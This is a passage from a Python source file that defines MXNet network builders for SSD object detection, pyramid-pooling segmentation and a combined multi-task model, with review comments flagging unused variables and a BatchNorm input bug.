        number of filters for extra layers, you can use -1 for extracted features,
        however, if normalization and scale is applied, the number of filter for
        that layer must be provided.
        For example:
        num_filters = [512, -1, 512, 256, 256, 256]
    strides : list of int
        strides for the 3x3 convolution appended, -1 can be used for extracted
        feature layers
    pads : list of int
        paddings for the 3x3 convolution, -1 can be used for extracted layers
    sizes : list or list of list
        [min_size, max_size] for all layers or [[], [], []...] for specific layers
    ratios : list or list of list
        [ratio1, ratio2...] for all layers or [[], [], ...] for specific layers
    normalizations : int or list of int
        use normalizations value for all layers or [...] for specific layers,
        -1 indicate no normalizations and scales
    steps : list
        specify steps for each MultiBoxPrior layer, leave empty, it will calculate
        according to layer dimensions
    min_filter : int
        minimum number of filters used in 1x1 convolution
    nms_thresh : float
        non-maximum suppression threshold
    force_suppress : boolean
        whether suppress different class objects
    nms_topk : int
        apply NMS to top K detections

    Returns
    -------
    mx.Symbol
    """
    # Ground-truth detection labels supplied by the training data iterator.
    label = mx.sym.Variable('label_det')
    # Instantiate the backbone and expose its intermediate feature maps.
    body = import_module(network).get_symbol(num_classes, **kwargs)
    internals = body.get_internals()
    data = internals['data']
    # NOTE(review): data/res3/res4 are extracted but unused in this function —
    # presumably kept for parity with the other builders; confirm before removing.
    res3 = internals[from_layers[0]+"_output"]
    res4 = internals[from_layers[1]+"_output"]
    conv_feat = internals[from_layers[2]+"_output"]
    ### remove res3 from input layer of SSD
    # Drop the first (shallowest) entry from every per-layer config list so the
    # SSD head starts one stage deeper in the backbone.
    from_layers=from_layers[1:]
    num_filters=num_filters[1:]
    strides=strides[1:]
    pads=pads[1:]
    sizes=sizes[1:]
    ratios=ratios[1:]
    # Build the SSD feature pyramid and per-layer box/class predictors.
    layers = multi_layer_feature(body, from_layers, num_filters, strides, pads,
        min_filter=min_filter)
    loc_preds, cls_preds, anchor_boxes = multitask_layer(layers, \
        num_classes, sizes=sizes, ratios=ratios, normalization=normalizations, \
        num_channels=num_filters, clip=False, interm_layer=0, steps=steps)
    # Match anchors to ground truth; hard-negative mining at a 3:1 ratio.
    tmp = mx.contrib.symbol.MultiBoxTarget(
        *[anchor_boxes, label, cls_preds], overlap_threshold=.5, \
        ignore_label=-1, negative_mining_ratio=3, minimum_negative_samples=0, \
        negative_mining_thresh=.5, variances=(0.1, 0.1, 0.2, 0.2),
        name="multibox_target")
    loc_target = tmp[0]
    loc_target_mask = tmp[1]
    cls_target = tmp[2]
    # Per-anchor softmax classification loss; unmatched anchors are ignored.
    cls_prob = mx.symbol.SoftmaxOutput(data=cls_preds, label=cls_target, \
        ignore_label=-1, use_ignore=True, grad_scale=1., multi_output=True, \
        normalization='valid', name="cls_prob")
    # Smooth-L1 localization loss, masked to positive (matched) anchors.
    loc_loss_ = mx.symbol.smooth_l1(name="loc_loss_", \
        data=loc_target_mask * (loc_preds - loc_target), scalar=1.0)
    loc_loss = mx.symbol.MakeLoss(loc_loss_, grad_scale=1., \
        normalization='valid', name="loc_loss")
    # monitoring training status
    # grad_scale=0 makes these outputs gradient-free monitoring channels.
    cls_label = mx.symbol.MakeLoss(data=cls_target, grad_scale=0, name="cls_label")
    det = mx.contrib.symbol.MultiBoxDetection(*[cls_prob, loc_preds, anchor_boxes], \
        name="detection", nms_threshold=nms_thresh, force_suppress=force_suppress,
        variances=(0.1, 0.1, 0.2, 0.2), nms_topk=nms_topk)
    det = mx.symbol.MakeLoss(data=det, grad_scale=0, name="det_out")
    # group output
    out = mx.symbol.Group([cls_prob, loc_loss, cls_label, det])
    return out
def get_det_symbol(network, num_classes, from_layers, num_filters, sizes, ratios,
                   strides, pads, normalizations=-1, steps=[], min_filter=128,
                   nms_thresh=0.5, force_suppress=False, nms_topk=400, **kwargs):
    """Build network for testing SSD

    Parameters
    ----------
    network : str
        base network symbol name
    num_classes : int
        number of object classes not including background
    from_layers : list of str
        feature extraction layers, use '' for add extra layers
        For example:
        from_layers = ['relu4_3', 'fc7', '', '', '', '']
        which means extract feature from relu4_3 and fc7, adding 4 extra layers
        on top of fc7
    num_filters : list of int
        number of filters for extra layers, you can use -1 for extracted features,
        however, if normalization and scale is applied, the number of filter for
        that layer must be provided.
        For example:
        num_filters = [512, -1, 512, 256, 256, 256]
    strides : list of int
        strides for the 3x3 convolution appended, -1 can be used for extracted
        feature layers
    pads : list of int
        paddings for the 3x3 convolution, -1 can be used for extracted layers
    sizes : list or list of list
        [min_size, max_size] for all layers or [[], [], []...] for specific layers
    ratios : list or list of list
        [ratio1, ratio2...] for all layers or [[], [], ...] for specific layers
    normalizations : int or list of int
        use normalizations value for all layers or [...] for specific layers,
        -1 indicate no normalizations and scales
    steps : list
        specify steps for each MultiBoxPrior layer, leave empty, it will calculate
        according to layer dimensions
    min_filter : int
        minimum number of filters used in 1x1 convolution
    nms_thresh : float
        non-maximum suppression threshold
    force_suppress : boolean
        whether suppress different class objects
    nms_topk : int
        apply NMS to top K detections

    Returns
    -------
    mx.Symbol
    """
    # Inference twin of get_det_symbol_train: same graph construction, but no
    # targets/losses — only NMS-filtered detections are produced.
    body = import_module(network).get_symbol(num_classes, **kwargs)
    internals = body.get_internals()
    data = internals['data']
    # NOTE(review): data/res3/res4 are extracted but unused in this function —
    # presumably kept for parity with the other builders; confirm before removing.
    res3 = internals[from_layers[0]+"_output"]
    res4 = internals[from_layers[1]+"_output"]
    conv_feat = internals[from_layers[2]+"_output"]
    ### remove res3 from input layer of SSD
    from_layers=from_layers[1:]
    num_filters=num_filters[1:]
    strides=strides[1:]
    pads=pads[1:]
    sizes=sizes[1:]
    ratios=ratios[1:]
    # Build the SSD feature pyramid and per-layer box/class predictors.
    layers = multi_layer_feature(body, from_layers, num_filters, strides, pads,
        min_filter=min_filter)
    loc_preds, cls_preds, anchor_boxes = multitask_layer(layers, \
        num_classes, sizes=sizes, ratios=ratios, normalization=normalizations, \
        num_channels=num_filters, clip=False, interm_layer=0, steps=steps)
    # Channel-wise softmax over class scores (no labels at test time).
    cls_prob = mx.symbol.SoftmaxActivation(data=cls_preds, mode='channel', \
        name='cls_prob')
    # Decode boxes and apply non-maximum suppression.
    det = mx.contrib.symbol.MultiBoxDetection(*[cls_prob, loc_preds, anchor_boxes], \
        name="detection", nms_threshold=nms_thresh, force_suppress=force_suppress, \
        variances=(0.1, 0.1, 0.2, 0.2), nms_topk=nms_topk)
    # group output
    out = mx.symbol.Group([det])
    return out
#------------------------------------------------------------------
# SINGLE TASK: SEGMENTATION
#------------------------------------------------------------------
def get_seg_symbol_train(network, num_classes, from_layers, num_filters, strides, pads,
                         sizes, ratios, normalizations=-1, steps=[], min_filter=128,
                         nms_thresh=0.5, force_suppress=False, nms_topk=400, **kwargs):
    """Build network symbol for training SSD

    Parameters
    ----------
    network : str
        base network symbol name
    num_classes : int
        number of object classes not including background
    from_layers : list of str
        feature extraction layers, use '' for add extra layers
        For example:
        from_layers = ['relu4_3', 'fc7', '', '', '', '']
        which means extract feature from relu4_3 and fc7, adding 4 extra layers
        on top of fc7
    num_filters : list of int
        number of filters for extra layers, you can use -1 for extracted features,
        however, if normalization and scale is applied, the number of filter for
        that layer must be provided.
        For example:
        num_filters = [512, -1, 512, 256, 256, 256]
    strides : list of int
        strides for the 3x3 convolution appended, -1 can be used for extracted
        feature layers
    pads : list of int
        paddings for the 3x3 convolution, -1 can be used for extracted layers
    sizes : list or list of list
        [min_size, max_size] for all layers or [[], [], []...] for specific layers
    ratios : list or list of list
        [ratio1, ratio2...] for all layers or [[], [], ...] for specific layers
    normalizations : int or list of int
        use normalizations value for all layers or [...] for specific layers,
        -1 indicate no normalizations and scales
    steps : list
        specify steps for each MultiBoxPrior layer, leave empty, it will calculate
        according to layer dimensions
    min_filter : int
        minimum number of filters used in 1x1 convolution
    nms_thresh : float
        non-maximum suppression threshold
    force_suppress : boolean
        whether suppress different class objects
    nms_topk : int
        apply NMS to top K detections

    Returns
    -------
    mx.Symbol
    """
    # NOTE(review): docstring and most box/NMS parameters are inherited from
    # the SSD builder above; this function only builds the segmentation head
    # (pyramid pooling over backbone features -> softmax over seg_classes).
    # label = mx.sym.Variable('label_det')
    body = import_module(network).get_symbol(num_classes, **kwargs)
    internals = body.get_internals()
    data = internals['data']
    res3 = internals[from_layers[0]+"_output"]
    res4 = internals[from_layers[1]+"_output"]
    conv_feat = internals[from_layers[2]+"_output"]
    # segmentation task (pyramid pooling module)
    # BlockGrad stops gradients from the seg head flowing into res3/res4.
    res3_block = mx.sym.BlockGrad(data=res3, name="res3_block")
    # 1x1 reduce then 3x3 refine on res3, each followed by BatchNorm.
    res3_reduced = mx.sym.Convolution(data=res3_block, kernel=(1,1), stride=(1,1), pad=(0,0), \
        num_filter=128, no_bias=True, workspace=1024, name="res3_reduced")
    res3_reduced_bn = mx.sym.BatchNorm(data=res3_reduced, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res3_reduced_bn')
    res3_reduced2 = mx.sym.Convolution(data=res3_reduced_bn, kernel=(3,3), stride=(1,1), pad=(1,1), \
        num_filter=128, no_bias=True, workspace=1024, name="res3_reduced2")
    res3_reduced2_bn = mx.sym.BatchNorm(data=res3_reduced2, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res3_reduced2_bn')
    # Same reduce/refine pattern on res4, at 256 channels.
    res4_block = mx.sym.BlockGrad(data=res4, name="res4_block")
    res4_reduced = mx.sym.Convolution(data=res4_block, kernel=(1,1), stride=(1,1), pad=(0,0), \
        num_filter=256, no_bias=True, workspace=1024, name="res4_reduced")
    res4_reduced_bn = mx.sym.BatchNorm(data=res4_reduced, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res4_reduced_bn')
    res4_reduced2 = mx.sym.Convolution(data=res4_reduced_bn, kernel=(3,3), stride=(1,1), pad=(1,1), \
        num_filter=256, no_bias=True, workspace=1024, name="res4_reduced2")
    res4_reduced2_bn = mx.sym.BatchNorm(data=res4_reduced2, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res4_reduced2_bn')
    res5_reduced = mx.symbol.Convolution(data=conv_feat, kernel=(1,1), stride=(1,1), pad=(0,0), \
        num_filter=512, no_bias=True, workspace=1024, name="res5_reduced")
    # NOTE(review): res5_reduced is computed but never consumed — this
    # BatchNorm takes conv_feat directly. Possibly intended data=res5_reduced;
    # confirm before changing, as it alters channel counts downstream.
    res5_reduced_bn = mx.sym.BatchNorm(data=conv_feat, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='res5_reduced_bn')
    # Pyramid pooling at three scales over the deepest features.
    score_pool1 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(1,1), stride=(1,1), pad=(0,0), pool_type='avg', name='score_pool1')
    score_pool2 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(2,2), stride=(2,2), pad=(0,0), pool_type='avg', name='score_pool2')
    score_pool4 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(4,4), stride=(4,4), pad=(0,0), pool_type='avg', name='score_pool4')
    # 1x1 conv + BatchNorm on each pooled scale.
    score2_pool4 = mx.symbol.Convolution(data=score_pool4, kernel=(1,1), stride=(1,1), pad=(0,0), \
        num_filter=128, no_bias=True, workspace=1024, name="score2_pool4")
    score2_pool4_bn = mx.sym.BatchNorm(data=score2_pool4, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='score2_pool4_bn')
    score2_pool2 = mx.symbol.Convolution(data=score_pool2, kernel=(1,1), stride=(1,1), pad=(0,0), \
        num_filter=256, no_bias=True, workspace=1024, name="score2_pool2")
    score2_pool2_bn = mx.sym.BatchNorm(data=score2_pool2, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='score2_pool2_bn')
    score2_pool1 = mx.symbol.Convolution(data=score_pool1, kernel=(1,1), stride=(1,1), pad=(0,0), \
        num_filter=512, no_bias=True, workspace=1024, name="score2_pool1")
    score2_pool1_bn = mx.sym.BatchNorm(data=score2_pool1, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='score2_pool1_bn')
    # Identity affine grid: bilinearly resample every branch to 64x128 so
    # they can be concatenated along the channel axis.
    affine_matrix = mx.sym.var("affine_matrix", shape=(1,6))
    grid = mx.sym.GridGenerator(data=affine_matrix, transform_type='affine', target_shape=(64, 128))
    score3_samp4 = mx.sym.BilinearSampler(data=score2_pool4_bn, grid=grid, name='score3_samp4')
    score3_samp2 = mx.sym.BilinearSampler(data=score2_pool2_bn, grid=grid, name='score3_samp2')
    score3_samp1 = mx.sym.BilinearSampler(data=score2_pool1_bn, grid=grid, name='score3_samp1')
    score3_sampy = mx.sym.BilinearSampler(data=res5_reduced_bn, grid=grid, name='score3_sampy')
    score3_samp0 = mx.sym.BilinearSampler(data=res4_reduced2_bn, grid=grid, name='score3_samp0')
    score3_sampx = mx.sym.BilinearSampler(data=res3_reduced2_bn, grid=grid, name='score3_sampx')
    score3_concat = mx.sym.concat(score3_samp4, score3_samp2, score3_samp1, score3_sampy, score3_samp0, score3_sampx, dim=1, name='score3_concat')
    # Fuse the concatenated pyramid into per-class score maps, then upsample
    # 2x with a deconvolution.
    score3_conv = mx.symbol.Convolution(data=score3_concat, kernel=(3,3), stride=(1,1), pad=(1,1), \
        num_filter=seg_classes, no_bias=True, workspace=1024, name="score3_conv")
    score3_conv_bn = mx.sym.BatchNorm(data=score3_conv, fix_gamma=True, eps=eps, use_global_stats=use_global_stats, name='score3_conv_bn')
    score4_conv = mx.symbol.Deconvolution(data=score3_conv_bn, kernel=(4,4), stride=(2,2), pad=(1,1), \
        num_filter=seg_classes, workspace=1024, name="score4_conv")
    # Pixel-wise softmax loss; label 255 ("void") is ignored, gradient
    # weighted 4x relative to other tasks.
    fcnxs = mx.symbol.SoftmaxOutput(data=score4_conv, multi_output=True, grad_scale=4., \
        use_ignore=True, ignore_label=255, name="seg_out")
    # group output
    out = mx.symbol.Group([fcnxs])
    return out
def get_seg_symbol(network, num_classes, from_layers, num_filters, sizes, ratios,
                   strides, pads, normalizations=-1, steps=[], min_filter=128,
                   nms_thresh=0.5, force_suppress=False, nms_topk=400, **kwargs):
    """Build the segmentation-only inference symbol (pyramid pooling head).

    Parameters
    ----------
    network : str
        base network symbol name, resolved via ``import_module``
    num_classes : int
        number of object classes not including background (forwarded to the
        base network factory)
    from_layers : list of str
        names of the three backbone layers feeding the segmentation head
        (res3-, res4- and res5-level feature maps, in that order)
    num_filters, sizes, ratios, strides, pads, normalizations, steps,
    min_filter, nms_thresh, force_suppress, nms_topk :
        unused by the segmentation-only head; kept so the signature matches
        the detection builders and callers can swap them freely

    Returns
    -------
    mx.Symbol
        grouped symbol whose single output is the "seg_out" softmax map
    """
    body = import_module(network).get_symbol(num_classes, **kwargs)
    internals = body.get_internals()
    res3 = internals[from_layers[0] + "_output"]
    res4 = internals[from_layers[1] + "_output"]
    conv_feat = internals[from_layers[2] + "_output"]
    # --- segmentation head (pyramid pooling module) ---
    # BlockGrad is a no-op at inference time but kept for parity with the
    # training graph, where it stops segmentation gradients from reaching
    # the shared backbone through res3/res4.
    res3_block = mx.sym.BlockGrad(data=res3, name="res3_block")
    res3_reduced = mx.sym.Convolution(data=res3_block, kernel=(1, 1), stride=(1, 1), pad=(0, 0),
                                      num_filter=128, no_bias=True, workspace=1024, name="res3_reduced")
    res3_reduced_bn = mx.sym.BatchNorm(data=res3_reduced, fix_gamma=True, eps=eps,
                                       use_global_stats=use_global_stats, name='res3_reduced_bn')
    res3_reduced2 = mx.sym.Convolution(data=res3_reduced_bn, kernel=(3, 3), stride=(1, 1), pad=(1, 1),
                                       num_filter=128, no_bias=True, workspace=1024, name="res3_reduced2")
    res3_reduced2_bn = mx.sym.BatchNorm(data=res3_reduced2, fix_gamma=True, eps=eps,
                                        use_global_stats=use_global_stats, name='res3_reduced2_bn')
    res4_block = mx.sym.BlockGrad(data=res4, name="res4_block")
    res4_reduced = mx.sym.Convolution(data=res4_block, kernel=(1, 1), stride=(1, 1), pad=(0, 0),
                                      num_filter=256, no_bias=True, workspace=1024, name="res4_reduced")
    res4_reduced_bn = mx.sym.BatchNorm(data=res4_reduced, fix_gamma=True, eps=eps,
                                       use_global_stats=use_global_stats, name='res4_reduced_bn')
    res4_reduced2 = mx.sym.Convolution(data=res4_reduced_bn, kernel=(3, 3), stride=(1, 1), pad=(1, 1),
                                       num_filter=256, no_bias=True, workspace=1024, name="res4_reduced2")
    res4_reduced2_bn = mx.sym.BatchNorm(data=res4_reduced2, fix_gamma=True, eps=eps,
                                        use_global_stats=use_global_stats, name='res4_reduced2_bn')
    res5_reduced = mx.symbol.Convolution(data=conv_feat, kernel=(1, 1), stride=(1, 1), pad=(0, 0),
                                         num_filter=512, no_bias=True, workspace=1024, name="res5_reduced")
    # BUG FIX: this BatchNorm previously took ``conv_feat`` directly, which
    # silently discarded the res5_reduced 1x1 projection computed above.
    # Note: checkpoints trained against the old (buggy) graph will not load
    # against the corrected parameter shapes.
    res5_reduced_bn = mx.sym.BatchNorm(data=res5_reduced, fix_gamma=True, eps=eps,
                                       use_global_stats=use_global_stats, name='res5_reduced_bn')
    # Average-pool the res5-level features at three scales (1x, 1/2, 1/4).
    score_pool1 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(1, 1), stride=(1, 1),
                                 pad=(0, 0), pool_type='avg', name='score_pool1')
    score_pool2 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(2, 2), stride=(2, 2),
                                 pad=(0, 0), pool_type='avg', name='score_pool2')
    score_pool4 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(4, 4), stride=(4, 4),
                                 pad=(0, 0), pool_type='avg', name='score_pool4')
    score2_pool4 = mx.symbol.Convolution(data=score_pool4, kernel=(1, 1), stride=(1, 1), pad=(0, 0),
                                         num_filter=128, no_bias=True, workspace=1024, name="score2_pool4")
    score2_pool4_bn = mx.sym.BatchNorm(data=score2_pool4, fix_gamma=True, eps=eps,
                                       use_global_stats=use_global_stats, name='score2_pool4_bn')
    score2_pool2 = mx.symbol.Convolution(data=score_pool2, kernel=(1, 1), stride=(1, 1), pad=(0, 0),
                                         num_filter=256, no_bias=True, workspace=1024, name="score2_pool2")
    score2_pool2_bn = mx.sym.BatchNorm(data=score2_pool2, fix_gamma=True, eps=eps,
                                       use_global_stats=use_global_stats, name='score2_pool2_bn')
    score2_pool1 = mx.symbol.Convolution(data=score_pool1, kernel=(1, 1), stride=(1, 1), pad=(0, 0),
                                         num_filter=512, no_bias=True, workspace=1024, name="score2_pool1")
    score2_pool1_bn = mx.sym.BatchNorm(data=score2_pool1, fix_gamma=True, eps=eps,
                                       use_global_stats=use_global_stats, name='score2_pool1_bn')
    # Resample every branch onto a fixed 64x128 grid so they can be
    # concatenated; "affine_matrix" is expected to be bound by the caller
    # (presumably an identity affine — TODO confirm against the data iter).
    affine_matrix = mx.sym.var("affine_matrix", shape=(1, 6))
    grid = mx.sym.GridGenerator(data=affine_matrix, transform_type='affine', target_shape=(64, 128))
    score3_samp4 = mx.sym.BilinearSampler(data=score2_pool4_bn, grid=grid, name='score3_samp4')
    score3_samp2 = mx.sym.BilinearSampler(data=score2_pool2_bn, grid=grid, name='score3_samp2')
    score3_samp1 = mx.sym.BilinearSampler(data=score2_pool1_bn, grid=grid, name='score3_samp1')
    score3_sampy = mx.sym.BilinearSampler(data=res5_reduced_bn, grid=grid, name='score3_sampy')
    score3_samp0 = mx.sym.BilinearSampler(data=res4_reduced2_bn, grid=grid, name='score3_samp0')
    score3_sampx = mx.sym.BilinearSampler(data=res3_reduced2_bn, grid=grid, name='score3_sampx')
    score3_concat = mx.sym.concat(score3_samp4, score3_samp2, score3_samp1, score3_sampy,
                                  score3_samp0, score3_sampx, dim=1, name='score3_concat')
    score3_conv = mx.symbol.Convolution(data=score3_concat, kernel=(3, 3), stride=(1, 1), pad=(1, 1),
                                        num_filter=seg_classes, no_bias=True, workspace=1024, name="score3_conv")
    score3_conv_bn = mx.sym.BatchNorm(data=score3_conv, fix_gamma=True, eps=eps,
                                      use_global_stats=use_global_stats, name='score3_conv_bn')
    # Learned 2x upsampling back toward input resolution.
    score4_conv = mx.symbol.Deconvolution(data=score3_conv_bn, kernel=(4, 4), stride=(2, 2), pad=(1, 1),
                                          num_filter=seg_classes, workspace=1024, name="score4_conv")
    # NOTE(review): ``multi_output`` is not a documented mx.sym.softmax
    # argument (it belongs to SoftmaxOutput); kept as-is — confirm against
    # the pinned MXNet version.
    fcnxs = mx.symbol.softmax(data=score4_conv, multi_output=True, name="seg_out")
    # group output
    out = mx.symbol.Group([fcnxs])
    return out
#------------------------------------------------------------------
# MULTI-TASK: DETECTION + SEGMENTATION (depth estimation not implemented below)
#------------------------------------------------------------------
def get_multi_symbol_train(network, num_classes, from_layers, num_filters, strides, pads,
                           sizes, ratios, normalizations=-1, steps=[], min_filter=128,
                           nms_thresh=0.5, force_suppress=False, nms_topk=400, **kwargs):
    """Build the multi-task training symbol: SSD detection + segmentation.

    Parameters
    ----------
    network : str
        base network symbol name, resolved via ``import_module``
    num_classes : int
        number of object classes not including background
    from_layers : list of str
        feature layers; index 0 (res3 level) feeds only the segmentation
        head, the remainder feed the SSD branch ('' entries add extra
        layers on top of the last named layer)
    num_filters, strides, pads : list of int
        extra-layer conv configuration, -1 for extracted layers
    sizes, ratios : list or list of list
        anchor sizes/ratios per detection layer
    normalizations : int or list of int
        per-layer normalization scales, -1 to disable
    steps : list
        explicit MultiBoxPrior steps; empty to infer from layer dimensions
    min_filter : int
        minimum number of filters used in 1x1 convolution
    nms_thresh : float
        non-maximum suppression threshold
    force_suppress : boolean
        whether suppress different class objects
    nms_topk : int
        apply NMS to top K detections

    Returns
    -------
    mx.Symbol
        group of [cls_prob, loc_loss, cls_label, det, seg_out]
    """
    label = mx.sym.Variable('label_det')
    body = import_module(network).get_symbol(num_classes, **kwargs)
    internals = body.get_internals()
    res3 = internals[from_layers[0] + "_output"]
    res4 = internals[from_layers[1] + "_output"]
    conv_feat = internals[from_layers[2] + "_output"]
    # res3 is used only by the segmentation head, so drop it (and its
    # per-layer configuration) from the SSD inputs.
    from_layers = from_layers[1:]
    num_filters = num_filters[1:]
    strides = strides[1:]
    pads = pads[1:]
    sizes = sizes[1:]
    ratios = ratios[1:]
    layers = multi_layer_feature(body, from_layers, num_filters, strides, pads,
                                 min_filter=min_filter)
    loc_preds, cls_preds, anchor_boxes = multitask_layer(
        layers, num_classes, sizes=sizes, ratios=ratios, normalization=normalizations,
        num_channels=num_filters, clip=False, interm_layer=0, steps=steps)
    tmp = mx.contrib.symbol.MultiBoxTarget(
        *[anchor_boxes, label, cls_preds], overlap_threshold=.5,
        ignore_label=-1, negative_mining_ratio=3, minimum_negative_samples=0,
        negative_mining_thresh=.5, variances=(0.1, 0.1, 0.2, 0.2),
        name="multibox_target")
    loc_target = tmp[0]
    loc_target_mask = tmp[1]
    cls_target = tmp[2]
    cls_prob = mx.symbol.SoftmaxOutput(data=cls_preds, label=cls_target,
                                       ignore_label=-1, use_ignore=True, grad_scale=1.,
                                       multi_output=True, normalization='valid', name="cls_prob")
    loc_loss_ = mx.symbol.smooth_l1(name="loc_loss_",
                                    data=loc_target_mask * (loc_preds - loc_target), scalar=1.0)
    loc_loss = mx.symbol.MakeLoss(loc_loss_, grad_scale=1.,
                                  normalization='valid', name="loc_loss")
    # grad_scale=0 heads below are monitoring-only: they contribute no
    # gradients, just expose values for training-status display.
    cls_label = mx.symbol.MakeLoss(data=cls_target, grad_scale=0, name="cls_label")
    det = mx.contrib.symbol.MultiBoxDetection(*[cls_prob, loc_preds, anchor_boxes],
                                              name="detection", nms_threshold=nms_thresh,
                                              force_suppress=force_suppress,
                                              variances=(0.1, 0.1, 0.2, 0.2), nms_topk=nms_topk)
    det = mx.symbol.MakeLoss(data=det, grad_scale=0, name="det_out")
    # --- segmentation head (pyramid pooling module) ---
    # BlockGrad stops segmentation gradients from reaching the shared
    # backbone through res3/res4.
    res3_block = mx.sym.BlockGrad(data=res3, name="res3_block")
    res3_reduced = mx.sym.Convolution(data=res3_block, kernel=(1, 1), stride=(1, 1), pad=(0, 0),
                                      num_filter=128, no_bias=True, workspace=1024, name="res3_reduced")
    res3_reduced_bn = mx.sym.BatchNorm(data=res3_reduced, fix_gamma=True, eps=eps,
                                       use_global_stats=use_global_stats, name='res3_reduced_bn')
    res3_reduced2 = mx.sym.Convolution(data=res3_reduced_bn, kernel=(3, 3), stride=(1, 1), pad=(1, 1),
                                       num_filter=128, no_bias=True, workspace=1024, name="res3_reduced2")
    res3_reduced2_bn = mx.sym.BatchNorm(data=res3_reduced2, fix_gamma=True, eps=eps,
                                        use_global_stats=use_global_stats, name='res3_reduced2_bn')
    res4_block = mx.sym.BlockGrad(data=res4, name="res4_block")
    res4_reduced = mx.sym.Convolution(data=res4_block, kernel=(1, 1), stride=(1, 1), pad=(0, 0),
                                      num_filter=256, no_bias=True, workspace=1024, name="res4_reduced")
    res4_reduced_bn = mx.sym.BatchNorm(data=res4_reduced, fix_gamma=True, eps=eps,
                                       use_global_stats=use_global_stats, name='res4_reduced_bn')
    res4_reduced2 = mx.sym.Convolution(data=res4_reduced_bn, kernel=(3, 3), stride=(1, 1), pad=(1, 1),
                                       num_filter=256, no_bias=True, workspace=1024, name="res4_reduced2")
    res4_reduced2_bn = mx.sym.BatchNorm(data=res4_reduced2, fix_gamma=True, eps=eps,
                                        use_global_stats=use_global_stats, name='res4_reduced2_bn')
    res5_reduced = mx.symbol.Convolution(data=conv_feat, kernel=(1, 1), stride=(1, 1), pad=(0, 0),
                                         num_filter=512, no_bias=True, workspace=1024, name="res5_reduced")
    # BUG FIX: previously BatchNorm normalized ``conv_feat`` directly,
    # leaving the res5_reduced 1x1 projection unused.  Old checkpoints will
    # not load against the corrected parameter shapes.
    res5_reduced_bn = mx.sym.BatchNorm(data=res5_reduced, fix_gamma=True, eps=eps,
                                       use_global_stats=use_global_stats, name='res5_reduced_bn')
    # Average-pool the res5-level features at three scales (1x, 1/2, 1/4).
    score_pool1 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(1, 1), stride=(1, 1),
                                 pad=(0, 0), pool_type='avg', name='score_pool1')
    score_pool2 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(2, 2), stride=(2, 2),
                                 pad=(0, 0), pool_type='avg', name='score_pool2')
    score_pool4 = mx.sym.Pooling(res5_reduced_bn, global_pool=False, kernel=(4, 4), stride=(4, 4),
                                 pad=(0, 0), pool_type='avg', name='score_pool4')
    score2_pool4 = mx.symbol.Convolution(data=score_pool4, kernel=(1, 1), stride=(1, 1), pad=(0, 0),
                                         num_filter=128, no_bias=True, workspace=1024, name="score2_pool4")
    score2_pool4_bn = mx.sym.BatchNorm(data=score2_pool4, fix_gamma=True, eps=eps,
                                       use_global_stats=use_global_stats, name='score2_pool4_bn')
    score2_pool2 = mx.symbol.Convolution(data=score_pool2, kernel=(1, 1), stride=(1, 1), pad=(0, 0),
                                         num_filter=256, no_bias=True, workspace=1024, name="score2_pool2")
    score2_pool2_bn = mx.sym.BatchNorm(data=score2_pool2, fix_gamma=True, eps=eps,
                                       use_global_stats=use_global_stats, name='score2_pool2_bn')
    score2_pool1 = mx.symbol.Convolution(data=score_pool1, kernel=(1, 1), stride=(1, 1), pad=(0, 0),
                                         num_filter=512, no_bias=True, workspace=1024, name="score2_pool1")
    score2_pool1_bn = mx.sym.BatchNorm(data=score2_pool1, fix_gamma=True, eps=eps,
                                       use_global_stats=use_global_stats, name='score2_pool1_bn')
    # Resample every branch onto a fixed 64x128 grid before concatenation.
    affine_matrix = mx.sym.var("affine_matrix", shape=(1, 6))
    grid = mx.sym.GridGenerator(data=affine_matrix, transform_type='affine', target_shape=(64, 128))
    score3_samp4 = mx.sym.BilinearSampler(data=score2_pool4_bn, grid=grid, name='score3_samp4')
    score3_samp2 = mx.sym.BilinearSampler(data=score2_pool2_bn, grid=grid, name='score3_samp2')
    score3_samp1 = mx.sym.BilinearSampler(data=score2_pool1_bn, grid=grid, name='score3_samp1')
    score3_sampy = mx.sym.BilinearSampler(data=res5_reduced_bn, grid=grid, name='score3_sampy')
    score3_samp0 = mx.sym.BilinearSampler(data=res4_reduced2_bn, grid=grid, name='score3_samp0')
    score3_sampx = mx.sym.BilinearSampler(data=res3_reduced2_bn, grid=grid, name='score3_sampx')
    score3_concat = mx.sym.concat(score3_samp4, score3_samp2, score3_samp1, score3_sampy,
                                  score3_samp0, score3_sampx, dim=1, name='score3_concat')
    score3_conv = mx.symbol.Convolution(data=score3_concat, kernel=(3, 3), stride=(1, 1), pad=(1, 1),
                                        num_filter=seg_classes, no_bias=True, workspace=1024, name="score3_conv")
    score3_conv_bn = mx.sym.BatchNorm(data=score3_conv, fix_gamma=True, eps=eps,
                                      use_global_stats=use_global_stats, name='score3_conv_bn')
    # Learned 2x upsampling back toward input resolution.
    score4_conv = mx.symbol.Deconvolution(data=score3_conv_bn, kernel=(4, 4), stride=(2, 2), pad=(1, 1),
                                          num_filter=seg_classes, workspace=1024, name="score4_conv")
    # Segmentation loss: per-pixel softmax, label 255 ignored, weighted 4x
    # relative to the detection losses.
    fcnxs = mx.symbol.SoftmaxOutput(data=score4_conv, multi_output=True, grad_scale=4.,
                                    use_ignore=True, ignore_label=255, name="seg_out")
    # group output
    out = mx.symbol.Group([cls_prob, loc_loss, cls_label, det, fcnxs])
    return out
def get_multi_symbol(network, num_classes, from_layers, num_filters, sizes, ratios,
                     strides, pads, normalizations=-1, steps=[], min_filter=128,
                     nms_thresh=0.5, force_suppress=False, nms_topk=400, **kwargs):
    """Build the multi-task inference symbol: SSD detection + segmentation.

    Parameters
    ----------
    network : str
        base network symbol name, resolved via ``import_module``
    num_classes : int
        number of object classes not including background
    from_layers : list of str
